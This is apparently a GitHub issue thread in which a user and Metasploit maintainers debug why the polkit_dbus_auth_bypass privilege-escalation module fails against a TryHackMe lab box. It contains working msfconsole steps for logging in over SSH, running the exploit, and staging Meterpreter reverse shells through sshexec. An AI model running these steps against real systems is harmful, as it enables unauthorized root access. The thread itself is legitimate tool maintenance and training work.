polkit_dbus_auth_bypass not working

[Signum21]

Steps to reproduce

1. Open SSH session:
   use auxiliary/scanner/ssh/ssh_login
   set username tryhackme
   set password TryHackMe123!
   set rhosts TRYHACKME_MACHINE_IP
   run

2. Run exploit:
   use exploit/linux/local/polkit_dbus_auth_bypass
   set iterations 100
   set session 1
   set lhost VPN_LOCAL_IP
   run

• Local machine informations:
  Kali WSL-2
  uname -a: Linux DESKTOP-NAME 5.10.102.1-microsoft-standard-WSL2 #⁠1 SMP Wed Mar 2 00:30:59 UTC 2022 x86_64 GNU/Linux

• Remote machine informations:
  uname -a: Linux polkit 5.8.0-1035-aws #⁠37~20.04.1-Ubuntu SMP Tue Jun 1 09:54:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
  apt list --installed | grep policykit-1: policykit-1/focal,now 0.105-26ubuntu1 amd64 [installed,upgradable to: 0.105-26ubuntu1.1]

Were you following a specific guide/tutorial or reading documentation?

I'm doing this TryHackMe free room:
https://tryhackme.com/room/polkit

I completed the tutorial using the manual commands and can confirm that the machine is working and is vulnerable.

Expected behavior

The exploit should create an user, set a password for it and remove the user.

Current behavior

The user is created successfully but the next steps fail.

Metasploit version

Framework: 6.2.23-dev
Console : 6.2.23-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/linux/local/polkit_dbus_auth_bypass

[linux/local/polkit_dbus_auth_bypass]
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
SESSION=1
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
FileDropperDelay=
AllowNoCleanup=false
USERNAME=msf
PASSWORD=8eWdoPns
TIMEOUT=30
ITERATIONS=100
WritableDir=/tmp
AutoCheck=true
ForceExploit=false
PAYLOAD=linux/x86/meterpreter/reverse_tcp
LHOST=VPN_LOCAL_IP

Database Configuration

The database contains the following information:

Collapse

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse

662    set loglevel 3
663    use auxiliary/scanner/ssh/ssh_login
664    set username tryhackme
665    set password TryHackMe123!
666    set rhosts TRYHACKME_MACHINE_IP
667    run
668    use exploit/linux/local/polkit_dbus_auth_bypass
669    set iterations 100
670    set session 1
671    set lhost VPN_LOCAL_IP
672    run
673    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

[11/03/2022 22:56:03] [e(0)] core: Failed to connect to the database: No database YAML file
[11/03/2022 22:56:27] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/linux/smtp/haraka.py:
/usr/share/metasploit-framework/modules/exploits/linux/smtp/haraka.py:14: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  from distutils.version import StrictVersion

[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 22:56:45] [e(0)] core: /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go failed to load - LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment.
[11/03/2022 23:18:01] [e(0)] core: Exception encountered in cmd_set - Msf::OptionValidateError The following options failed to validate: Value 'get' is not valid for option 'HTTP_METHOD'.
[11/03/2022 23:18:56] [e(0)] core: Exploit failed (multi/http/spring_framework_rce_spring4shell): Interrupt  - Interrupt
[11/03/2022 23:19:36] [e(0)] core: Exploit failed (multi/http/spring_framework_rce_spring4shell): Interrupt  - Interrupt
[11/04/2022 19:03:37] [e(0)] core: Failed to connect to the database: No database YAML file
[11/04/2022 19:25:27] [e(0)] core: Failed to connect to the database: No database YAML file

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell/reverse_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell/reverse_tcp_uuid with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell/reverse_tcp_uuid is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: bind to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: none to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_ipv6_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to bind
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_ipv6_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: bind to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: none to bind
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to bind
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: reverse to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: bind to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: noconn to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: none to none
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_bind_tcp_random_port with linux/local/polkit_dbus_auth_bypass]: tunnel to none
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_bind_tcp_random_port is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: reverse to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: bind to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: noconn to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: none to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_port with linux/local/polkit_dbus_auth_bypass]: tunnel to find
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_find_port is incompatible with linux/local/polkit_dbus_auth_bypass for ConnectionType: limiter was reverse bind noconn none tunnel, value was find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: reverse to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: bind to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: noconn to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: none to find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_find_tag with linux/local/polkit_dbus_auth_bypass]: tunnel to find
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_find_tag is incompatible with linux/local/polkit_dbus_auth_bypass for ConnectionType: limiter was reverse bind noconn none tunnel, value was find
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_reverse_tcp is compatible with linux/local/polkit_dbus_auth_bypass
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: reverse to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: bind to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: noconn to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: none to reverse
[11/04/2022 19:45:45] [d(3)] core: Checking compat [linux/x86/shell_reverse_tcp_ipv6 with linux/local/polkit_dbus_auth_bypass]: tunnel to reverse
[11/04/2022 19:45:45] [d(1)] core: Module linux/x86/shell_reverse_tcp_ipv6 is compatible with linux/local/polkit_dbus_auth_bypass

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse

Framework: 6.2.23-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.5 5 Jul 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: It was either preinstalled or installed through a metapackage like sudo apt install kali-tools-top10

[adfoster-r7]

I haven't confirmed this particular issue, but I know I ran into an issue with the polkit_dbus_auth_bypass module on a different environment where I had to modify this line as the output of pkexec --version on the environment was different than the hard coded match:

metasploit-framework/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb

Lines 129 to 131 in 455476c

	unless cmd_exec('pkexec --version') =~ /pkexec version (\d+\S*)/
	return CheckCode::Safe('The polkit framework is not installed.')
	end

I wouldn't have the cycles to confirm that it's the same issue here, but potentially the author @jheysel-r7 might be able to look. If not - pull requests are always welcome for module improvements and bug fixes 💯

[Signum21]

That's not the error I receive, the user is created successfully, the other two steps fail (password change and user deletion).
Looking at the code the error lines are 395 and 402:

print_error("Attempted to set the password #{datastore['Iterations']} times, did not work.")

print_warning("Unable to remove user: #{datastore['USERNAME']}, created during the running of this module")

[jheysel-r7]

Hey @Signum21, thanks for bringing up this issue. I was able to follow your steps above to reproduce this using auxiliary/scanner/ssh/ssh_login to start the initial session:

msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run

[*] Started reverse TCP handler on 192.168.2.114:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Attempting to create user fred
[+] User fred created with UID 1005
[*] Attempting to set the password of the newly created user, fred, to: derp
[*] 172.16.199.131 - SSH session 4 closed.
[-] Exploit failed: EOFError EOFError
[*] Exploit completed, but no session was created.

Depending on ITERATIONS and the determined @cmd_delay you'll get slightly different outcomes when running the module. After lots of testing the most common outcome was after the exploit_set_password was called the initial session would be closed and a EOFError: EOFError would be thrown.

I paused execution before exploit_set_password was called and closed the session. I ran it myself and noticed.

[1] pry(#<Msf::Modules::Exploit__Linux__Local__Polkit_dbus_auth_bypass::MetasploitModule>)> exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
[*] 172.16.199.131 - SSH session 7 closed.
EOFError: EOFError
from /Users/jheysel/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/rex-core-0.1.28/lib/rex/io/stream.rb:124:in `rescue in has_read_data?'
Caused by Errno::EBADF: Bad file descriptor
from /Users/jheysel/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/rex-core-0.1.28/lib/rex/io/stream.rb:116:in `select'

I'm not sure what about the session type shell linux causes the session to close when exploit_set_password is run. It's strange that the methods exploit_set_username and exploit_delete_user don't cause the session to be closed.

I noticed that if your session is meterpreter x64/linux this doesn't happen (using exploit/multi/ssh/sshexec for the initial session).

msf6 > use exploit/multi/ssh/sshexec
msf6 exploit(multi/ssh/sshexec) > run payload=linux/x64/meterpreter/reverse_tcp  rhosts=172.16.199.131 username=msfuser password=notpassword lhost=172.16.199.1

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.131:22 - Sending stager...
[*] Command Stager progress -  46.74% done (402/860 bytes)
[*] Sending stage (3045348 bytes) to 172.16.199.131
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.131:42142) at 2022-11-09 18:26:06 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)

meterpreter > bg
[*] Backgrounding session 3...
msf6 exploit(multi/ssh/sshexec) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  1         shell linux            SSH jheysel @             172.16.199.1:53621 -> 172.16.199.131:22 (172.16.199.131)
  3        meterpreter x64/linux  msfuser @ 172.16.199.131  172.16.199.1:4444 -> 172.16.199.131:42142 (172.16.199.131)

I'm not sure if we could improve the exploit in order to work with shell sessions, or if we need to put a guard to ensure a meterpreter session is in use. @AlanFoster - just off the top of your head, does a reason why shell sessions wouldn't work here, come to mind?

[adfoster-r7]

just off the top of your head, does a reason why shell sessions wouldn't work here, come to mind?

Whoops - forgot to reply to this at the time, the account ping was to @alanfoster instead of @adfoster-r7. It looked like a regression in the cmd_exec changes - so we asked smashery to take a look at this behind the scenes 👍